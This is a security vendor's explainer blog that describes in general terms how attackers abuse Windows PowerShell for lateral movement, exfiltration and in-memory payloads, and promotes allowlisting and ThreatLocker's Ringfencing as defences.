What is PowerShell? Understanding vulnerabilities and practical mitigations

A deep dive into PowerShell, the real-world threats and mitigations

PowerShell is a Microsoft-made tool for task automation and system management that’s built right into Windows. It’s essentially a mix of a command-line shell and a smart scripting language that gives admins and power users total control over their computers and networks.

PowerShell plays a critical role in the Windows ecosystem, and its versatility makes it an invaluable tool in most enterprise environments. Much of modern Windows system administration is performed through PowerShell.

The coolest part is that unlike the old-school Command Prompt, PowerShell works with objects instead of just plain text. This makes it much easier to filter and move data around without a headache.

It’s a standard Windows feature because it’s the "go-to" for things like fixing system errors, deploying software, or handling bulk tasks like setting up hundreds of user accounts at once. It’s also great for big-picture work. You can use it to run commands on remote machines or manage cloud services like Azure and Microsoft 365. That mix of remote power and deep system access is exactly why it’s one of the most useful tools on a modern PC.

It boasts a trusted reputation through its omnipresence and the industry expectation that all sysadmins use it or at least know of it.

But that trust can be easily exploited.

How attackers abuse PowerShell

The same uses that make PowerShell such a helpful tool are also what make it so attractive to attackers.

Cybercriminals often abuse PowerShell’s deep access to carry out fileless attacks that bypass traditional detection solutions. It can be used to secretly download malicious payloads, move laterally within a network, escalate privileges, and exfiltrate sensitive data—all without ever creating a detectable file on disk.

At the end of the day, PowerShell is a perfect example of how a great admin tool can become a dangerous weapon if not secured properly.

Using PowerShell for lateral movement

One of the biggest vulnerabilities is how PowerShell can be used for lateral movement.

Once an attacker gets into just one machine, they can use PowerShell to execute commands that abuse standard network protocols like SMB or WMI to quietly spread toother computers.

This lets them compromise additional systems and expand their footprint without relying on obvious remote desktop tools. Bad actors don't even need clunky remote desktop tools.

For example, if a corporate network gets breached, an attacker with stolen credentials could run PowerShell scripts on dozens of computers at the same time, spreading their control in seconds.

Data access and exfiltration

PowerShell is also incredibly good at file access and stealing data. It can find, zip up, and send files out of a network.

An attacker could easily write a quick script to hunt down sensitive documents (like .docx or .xlsx files), pack them into a zip folder, and ship them off to an external server.

Attackers often use PowerShell to scrape data from local drives, network shares, or mapped drives. This harvested data can then be exfiltrated or leveraged to facilitate further actions like lateral movement and escalating privileges.

Living-off-the-land attacks

Suppose an attacker gains access to a non-admin, low-privilege endpoint. Once inside, they use legitimate PowerShell commands like Invoke-Web Request, Invoke-Expression, or Start-Process to download and execute malicious payloads directly in memory.

These commands will leave minimal observable activity against a hard drive, allowing them to bypass many traditional antivirus and endpoint detection tools.

Launching BitLocker and other processes

Attackers often use PowerShell to execute malicious commands and encrypt entire drives using BitLocker or as part of a chained attack strategy. It’s an application that, by its nature, casts a wide net.

It’s wise to ensure that other applications cannot launch PowerShell in order to stop attackers from being able to execute additional payloads, establish persistence mechanisms, or obscure malicious activity by blending it with legitimate system processes.

Connecting to the internet

Finally, PowerShell is great at talking to the outside world.

Because it has built-in web commands like Invoke-Web Request, it can often bypass strict company firewalls. Many organizations block regular users from visiting certain sites but still let system-level tools like PowerShell connect to the internet.

This lets hackers download malicious files or talk to their command servers. Even worse, an attacker can run a quick "one-liner" command that pulls a script straight into the computer's memory and runs it without ever saving a file to the hard drive.

This type of attack is the basis for cut and paste attacks, and this makes it incredibly hard for standard antivirus software to spot.

How a Zero Trust model prevents PowerShell abuse

Securing PowerShell requires understanding exactly what it can do once it’s running.

Default-deny allowlisting policies block any unauthorized PowerShell scripts or commands from running in the first place, even if executed entirely in memory.

Enforcing least privilege access at the file system level also ensures that PowerShell can’t be used to harvest data from the endpoint and the drive shares that the endpoint can access.

ThreatLocker Ringfencing takes these controls to the next level.

Ringfencing enables you to restrict legitimate and approved tools like PowerShell from interacting with files, network locations, or other applications unless explicitly approved. This prevents attackers from using it to move laterally, access sensitive documents, or reach external servers.

For a deep dive into how Ringfencing keeps PowerShell in check, read “Lock down PowerShell vulnerabilities” in Cyber Hero Frontline, Issue 2.

‍